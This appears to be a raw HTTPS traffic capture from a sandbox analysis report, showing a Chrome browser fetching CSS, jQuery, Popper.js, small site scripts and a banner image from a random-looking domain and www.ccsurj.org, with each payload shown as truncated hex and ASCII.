                                          2025-01-12 00:17:04 UTC16384INData Raw: 63 74 69 6f 6e 3a 66 6f 63 75 73 2c 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 6c 69 67 68 74 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 61 63 74 69 6f 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 38 31 38 31 38 32 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 63 65 63 66 36 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 6c 69 67 68 74 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 61 63 74 69 6f 6e 2e 61 63 74 69 76 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 31 38 31 38 32 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 31 38 31 38 32 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 64 61 72 6b 7b 63 6f 6c 6f 72 3a 23 31 62 31 65 32 31 3b 62 61 63 6b 67 72
                                          Data Ascii: ction:focus,.list-group-item-light.list-group-item-action:hover{color:#818182;background-color:#ececf6}.list-group-item-light.list-group-item-action.active{color:#fff;background-color:#818182;border-color:#818182}.list-group-item-dark{color:#1b1e21;backgr
                                          2025-01-12 00:17:04 UTC16384INData Raw: 66 39 66 61 21 69 6d 70 6f 72 74 61 6e 74 7d 61 2e 62 67 2d 6c 69 67 68 74 3a 66 6f 63 75 73 2c 61 2e 62 67 2d 6c 69 67 68 74 3a 68 6f 76 65 72 2c 62 75 74 74 6f 6e 2e 62 67 2d 6c 69 67 68 74 3a 66 6f 63 75 73 2c 62 75 74 74 6f 6e 2e 62 67 2d 6c 69 67 68 74 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 61 65 30 65 35 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 67 2d 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 34 33 61 34 30 21 69 6d 70 6f 72 74 61 6e 74 7d 61 2e 62 67 2d 64 61 72 6b 3a 66 6f 63 75 73 2c 61 2e 62 67 2d 64 61 72 6b 3a 68 6f 76 65 72 2c 62 75 74 74 6f 6e 2e 62 67 2d 64 61 72 6b 3a 66 6f 63 75 73 2c 62 75 74 74 6f 6e 2e 62 67 2d 64 61 72 6b 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e
                                          Data Ascii: f9fa!important}a.bg-light:focus,a.bg-light:hover,button.bg-light:focus,button.bg-light:hover{background-color:#dae0e5!important}.bg-dark{background-color:#343a40!important}a.bg-dark:focus,a.bg-dark:hover,button.bg-dark:focus,button.bg-dark:hover{backgroun
                                          2025-01-12 00:17:04 UTC16384INData Raw: 6e 2d 63 6f 6e 74 65 6e 74 3a 73 74 72 65 74 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 73 65 6c 66 2d 6c 67 2d 61 75 74 6f 7b 2d 6d 73 2d 66 6c 65 78 2d 69 74 65 6d 2d 61 6c 69 67 6e 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 73 65 6c 66 2d 6c 67 2d 73 74 61 72 74 7b 2d 6d 73 2d 66 6c 65 78 2d 69 74 65 6d 2d 61 6c 69 67 6e 3a 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 73 65 6c 66 2d 6c 67 2d 65 6e 64 7b 2d 6d 73 2d 66 6c 65 78 2d 69 74 65 6d 2d 61 6c 69 67 6e 3a 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67
                                          Data Ascii: n-content:stretch!important}.align-self-lg-auto{-ms-flex-item-align:auto!important;align-self:auto!important}.align-self-lg-start{-ms-flex-item-align:start!important;align-self:flex-start!important}.align-self-lg-end{-ms-flex-item-align:end!important;alig
                                          2025-01-12 00:17:04 UTC13169INData Raw: 2e 6d 78 2d 6d 64 2d 6e 31 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 62 2d 6d 64 2d 6e 31 2c 2e 6d 79 2d 6d 64 2d 6e 31 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 6c 2d 6d 64 2d 6e 31 2c 2e 6d 78 2d 6d 64 2d 6e 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 2d 6d 64 2d 6e 32 7b 6d 61 72 67 69 6e 3a 2d 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6d 64 2d 6e 32 2c 2e 6d 79 2d 6d 64 2d 6e 32 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 72 2d 6d 64 2d 6e 32 2c 2e 6d 78 2d 6d 64 2d 6e 32 7b 6d 61 72 67 69 6e 2d 72 69 67 68
                                          Data Ascii: .mx-md-n1{margin-right:-.25rem!important}.mb-md-n1,.my-md-n1{margin-bottom:-.25rem!important}.ml-md-n1,.mx-md-n1{margin-left:-.25rem!important}.m-md-n2{margin:-.5rem!important}.mt-md-n2,.my-md-n2{margin-top:-.5rem!important}.mr-md-n2,.mx-md-n2{margin-righ


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          49192.168.2.449803122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:03 UTC534OUTGET /jquery.min.js HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:03 UTC381INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:03 GMT
                                          Content-Type: application/javascript
                                          Content-Length: 89475
                                          Last-Modified: Tue, 26 Dec 2023 13:01:43 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "658aceb7-15d83"
                                          Expires: Sun, 12 Jan 2025 12:17:03 GMT
                                          Cache-Control: max-age=43200
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:03 UTC16003INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                          Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                          2025-01-12 00:17:03 UTC16384INData Raw: 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 21 31 3b 75 3d 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 7d 72 65 74 75 72 6e 21 30 7d 69 66 28 75 3d 5b 6d 3f 63 2e 66 69 72 73 74 43 68 69 6c 64 3a 63 2e 6c 61 73 74 43 68 69 6c 64 5d 2c 6d 26 26 70 29 7b 64 3d 28 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 63 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 26 26 72 5b 32 5d 2c 61 3d 73 26 26 63 2e 63 68 69 6c
                                          Data Ascii: a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return!1;u=l="only"===h&&!u&&"nextSibling"}return!0}if(u=[m?c.firstChild:c.lastChild],m&&p){d=(s=(r=(i=(o=(a=c)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1])&&r[2],a=s&&c.chil
                                          2025-01-12 00:17:04 UTC16384INData Raw: 28 6e 29 29 66 6f 72 28 73 20 69 6e 20 69 3d 21 30 2c 6e 29 24 28 65 2c 74 2c 73 2c 6e 5b 73 5d 2c 21 30 2c 6f 2c 61 29 3b 65 6c 73 65 20 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 26 26 28 69 3d 21 30 2c 6d 28 72 29 7c 7c 28 61 3d 21 30 29 2c 6c 26 26 28 61 3f 28 74 2e 63 61 6c 6c 28 65 2c 72 29 2c 74 3d 6e 75 6c 6c 29 3a 28 6c 3d 74 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 2e 63 61 6c 6c 28 53 28 65 29 2c 6e 29 7d 29 29 2c 74 29 29 66 6f 72 28 3b 73 3c 75 3b 73 2b 2b 29 74 28 65 5b 73 5d 2c 6e 2c 61 3f 72 3a 72 2e 63 61 6c 6c 28 65 5b 73 5d 2c 73 2c 74 28 65 5b 73 5d 2c 6e 29 29 29 3b 72 65 74 75 72 6e 20 69 3f 65 3a 6c 3f 74 2e 63 61 6c 6c 28 65 29 3a 75 3f 74 28 65 5b 30 5d 2c 6e 29 3a 6f 7d 2c 5f 3d 2f 5e 2d 6d 73
                                          Data Ascii: (n))for(s in i=!0,n)$(e,t,s,n[s],!0,o,a);else if(void 0!==r&&(i=!0,m(r)||(a=!0),l&&(a?(t.call(e,r),t=null):(l=t,t=function(e,t,n){return l.call(S(e),n)})),t))for(;s<u;s++)t(e[s],n,a?r:r.call(e[s],s,t(e[s],n)));return i?e:l?t.call(e):u?t(e[0],n):o},_=/^-ms
                                          2025-01-12 00:17:04 UTC16384INData Raw: 28 72 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 6e 26 26 69 65 28 72 29 26 26 79 65 28 76 65 28 72 2c 22 73 63 72 69 70 74 22 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 72 29 29 3b 72 65 74 75 72 6e 20 65 7d 53 2e 65 78 74 65 6e 64 28 7b 68 74 6d 6c 50 72 65 66 69 6c 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 2c 63 3d 65 2e 63 6c 6f 6e 65 4e 6f 64 65 28 21 30 29 2c 66 3d 69 65 28 65 29 3b 69 66 28 21 28 79 2e 6e 6f 43 6c 6f 6e 65 43 68 65 63 6b 65 64 7c 7c 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 26 26 31 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c
                                          Data Ascii: (r)),r.parentNode&&(n&&ie(r)&&ye(ve(r,"script")),r.parentNode.removeChild(r));return e}S.extend({htmlPrefilter:function(e){return e},clone:function(e,t,n){var r,i,o,a,s,u,l,c=e.cloneNode(!0),f=ie(e);if(!(y.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||
                                          2025-01-12 00:17:04 UTC16384INData Raw: 61 70 70 65 6e 64 43 68 69 6c 64 28 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6f 70 74 69 6f 6e 22 29 29 2c 72 74 2e 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 2c 79 2e 63 68 65 63 6b 4f 6e 3d 22 22 21 3d 3d 72 74 2e 76 61 6c 75 65 2c 79 2e 6f 70 74 53 65 6c 65 63 74 65 64 3d 69 74 2e 73 65 6c 65 63 74 65 64 2c 28 72 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 76 61 6c 75 65 3d 22 74 22 2c 72 74 2e 74 79 70 65 3d 22 72 61 64 69 6f 22 2c 79 2e 72 61 64 69 6f 56 61 6c 75 65 3d 22 74 22 3d 3d 3d 72 74 2e 76 61 6c 75 65 3b 76 61 72 20 70 74 2c 64 74 3d 53 2e 65 78 70 72 2e 61 74 74 72 48 61 6e 64 6c 65 3b 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74
                                          Data Ascii: appendChild(E.createElement("option")),rt.type="checkbox",y.checkOn=""!==rt.value,y.optSelected=it.selected,(rt=E.createElement("input")).value="t",rt.type="radio",y.radioValue="t"===rt.value;var pt,dt=S.expr.attrHandle;S.fn.extend({attr:function(e,t){ret
                                          2025-01-12 00:17:04 UTC7936INData Raw: 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65 6e 67 74 68 29 7d 2c 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 43 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 7d 63 61 74 63 68 28 65 29 7b 7d 7d 3b 76 61 72 20 5f 74 3d 7b 30 3a 32 30 30 2c 31 32 32 33 3a 32 30 34 7d 2c 7a 74 3d 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 28 29 3b 79 2e 63 6f 72 73 3d 21 21 7a 74 26 26 22 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 22 69 6e 20 7a 74 2c 79 2e 61 6a 61 78 3d 7a 74 3d 21 21 7a 74 2c 53 2e 61 6a 61 78 54 72 61 6e 73 70 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 6f 2c 61 3b 69 66 28 79 2e 63 6f 72 73 7c 7c 7a 74 26 26 21 69 2e 63 72
                                          Data Ascii: getClientRects().length)},S.ajaxSettings.xhr=function(){try{return new C.XMLHttpRequest}catch(e){}};var _t={0:200,1223:204},zt=S.ajaxSettings.xhr();y.cors=!!zt&&"withCredentials"in zt,y.ajax=zt=!!zt,S.ajaxTransport(function(i){var o,a;if(y.cors||zt&&!i.cr


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          50192.168.2.449800122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:03 UTC534OUTGET /popper.min.js HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:03 UTC380INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:03 GMT
                                          Content-Type: application/javascript
                                          Content-Length: 21218
                                          Last-Modified: Tue, 26 Dec 2023 13:01:44 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "658aceb8-52e2"
                                          Expires: Sun, 12 Jan 2025 12:17:03 GMT
                                          Cache-Control: max-age=43200
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:03 UTC16004INData Raw: 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 39 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e
                                          Data Ascii: /* Copyright (C) Federico Zivolo 2019 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&defin
                                          2025-01-12 00:17:03 UTC5214INData Raw: 69 67 68 74 29 29 29 2c 61 65 28 7b 7d 2c 6f 2c 6e 29 7d 7d 3b 72 65 74 75 72 6e 20 6c 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 2d 31 3d 3d 3d 5b 27 6c 65 66 74 27 2c 27 74 6f 70 27 5d 2e 69 6e 64 65 78 4f 66 28 65 29 3f 27 73 65 63 6f 6e 64 61 72 79 27 3a 27 70 72 69 6d 61 72 79 27 3b 66 3d 6c 65 28 7b 7d 2c 66 2c 6d 5b 74 5d 28 65 29 29 7d 29 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 66 2c 65 7d 2c 70 72 69 6f 72 69 74 79 3a 5b 27 6c 65 66 74 27 2c 27 72 69 67 68 74 27 2c 27 74 6f 70 27 2c 27 62 6f 74 74 6f 6d 27 5d 2c 70 61 64 64 69 6e 67 3a 35 2c 62 6f 75 6e 64 61 72 69 65 73 45 6c 65 6d 65 6e 74 3a 27 73 63 72 6f 6c 6c 50 61 72 65 6e 74 27 7d 2c 6b 65 65 70 54 6f 67 65 74 68 65 72 3a 7b 6f 72 64 65
                                          Data Ascii: ight))),ae({},o,n)}};return l.forEach(function(e){var t=-1===['left','top'].indexOf(e)?'secondary':'primary';f=le({},f,m[t](e))}),e.offsets.popper=f,e},priority:['left','right','top','bottom'],padding:5,boundariesElement:'scrollParent'},keepTogether:{orde


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          51192.168.2.449796154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:03 UTC539OUTGET /system/resource/js/ajax.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:03 UTC351INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:03 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 6767
                                          Last-Modified: Fri, 10 Jan 2025 07:04:25 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c679-1a6f"
                                          Expires: Tue, 11 Feb 2025 00:17:03 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:03 UTC6767INData Raw: ef bb bf 2f 2f e5 88 9b e5 bb ba 58 4d 4c 48 54 54 50 e5 af b9 e8 b1 a1 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 72 65 61 74 65 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 0d 0a 7b 0d 0a 20 20 20 20 76 61 72 20 78 6d 6c 48 74 74 70 20 3d 20 6e 75 6c 6c 3b 0d 0a 20 20 20 20 74 72 79 7b 0d 0a 09 20 20 20 09 09 78 6d 6c 48 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 22 29 3b 0d 0a 09 20 20 20 7d 0d 0a 09 20 20 20 63 61 74 63 68 28 65 29 0d 0a 09 20 20 20 7b 0d 0a 09 09 20 20 20 74 72 79 7b 0d 0a 09 09 20 20 20 20 20 20 20 20 20 20 78 6d 6c 48 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 73 78 6d 6c 32 2e 58 4d 4c 48 54 54 50 22 29 3b 0d 0a
                                          Data Ascii: //XMLHTTPfunction createXMLHttpRequest(){ var xmlHttp = null; try{ xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { try{ xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          52192.168.2.449797154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:03 UTC543OUTGET /system/resource/js/openlink.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:03 UTC326INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:03 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 648
                                          Last-Modified: Fri, 10 Jan 2025 07:04:27 GMT
                                          Connection: close
                                          ETag: "6780c67b-288"
                                          Expires: Tue, 11 Feb 2025 00:17:03 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:03 UTC648INData Raw: ef bb bf 66 75 6e 63 74 69 6f 6e 20 5f 6f 70 65 6e 53 65 6c 65 63 74 4c 69 6e 6b 28 73 65 6c 65 63 74 6f 2c 20 6c 69 6e 6b 6e 61 6d 65 2c 20 61 64 64 63 6c 69 63 6b 74 69 6d 65 6e 61 6d 65 29 0d 0a 7b 0d 0a 20 20 20 20 69 66 28 6c 69 6e 6b 6e 61 6d 65 20 3d 3d 20 75 6e 64 65 66 69 6e 65 64 20 7c 7c 20 6c 69 6e 6b 6e 61 6d 65 20 3d 3d 20 22 22 29 0d 0a 20 20 20 20 20 20 20 20 6c 69 6e 6b 6e 61 6d 65 20 3d 20 22 76 61 6c 75 65 22 3b 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 76 61 72 20 69 6e 64 65 78 20 3d 20 73 65 6c 65 63 74 6f 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3b 0d 0a 20 20 20 20 76 61 72 20 6f 70 74 69 6f 6e 20 3d 20 73 65 6c 65 63 74 6f 2e 6f 70 74 69 6f 6e 73 5b 69 6e 64 65 78 5d 3b 0d 0a 20 20 20 20 0d 0a
                                          Data Ascii: function _openSelectLink(selecto, linkname, addclicktimename){ if(linkname == undefined || linkname == "") linkname = "value"; var index = selecto.selectedIndex; var option = selecto.options[index];


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          53192.168.2.449798154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:03 UTC377OUTGET /images/21/11/25/1p6vg4xelj/banner-1.jpg HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:03 UTC304INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:03 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 274578
                                          Last-Modified: Fri, 10 Jan 2025 07:04:27 GMT
                                          Connection: close
                                          ETag: "6780c67b-43092"
                                          Expires: Tue, 11 Feb 2025 00:17:03 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:03 UTC16080INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 02 02 02 02 02 02 02 02 02 02 02 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 01 78 04 b0 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 02 02 03 01 01 01 01 00 00 00 00 00 00 00 00 06 07 04 05 02 03 08 01 09 00 0a ff c4 00 51 10 00 01 03 03 03 02 04 04 04 04 04 02 08 03 02 0f 02 01 03 04 05 06 11 00 12 21 13 31 07 14 22 41 15 32 51 61 08 23 42 71 16
                                          Data Ascii: JFIFHHCCxQ!1"A2Qa#Bq
